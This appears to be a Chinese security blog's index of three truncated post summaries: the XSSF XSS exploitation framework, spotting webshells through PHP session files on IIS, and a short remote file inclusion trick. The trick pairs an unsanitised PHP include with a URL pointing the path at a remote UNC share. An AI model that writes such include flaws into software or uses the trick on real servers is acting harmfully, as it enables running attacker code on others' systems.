摘要：The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, p 阅读全文

摘要：SESSION和COOKIE不同，COOKIE是存放在客户端的文件，而SESSION是存放在服务器上，同时也增强了安全性。如果一个 WEBSHELL的验证方式是SESSION，我们可以通过它检测出服务器的木马。 我的环境是IIS+PHP，在PHP.ini中，有这么个选项，session.gc_maxlifetime = 1440，也就是SESSION默 认到期的时间是24小时，如果客户端没做出反应，24小时后session文件就删除了，即使在客户端关闭了浏览器，它的session文件依然存在于 服务器上，php.ini中设置存放路径是session.save_path = "C:\W 阅读全文

摘要：建一个php文件，内容： <? include $path."config/config.inc.php" ?> 当前目录下建一个config文件夹，再在文件夹内建config.inc.php，就可以了。 访问http://xxx/xx.php?x=file:///\\ip\x$\xx\xyz xyz就是config文件夹所在的路径by: 乱雪 阅读全文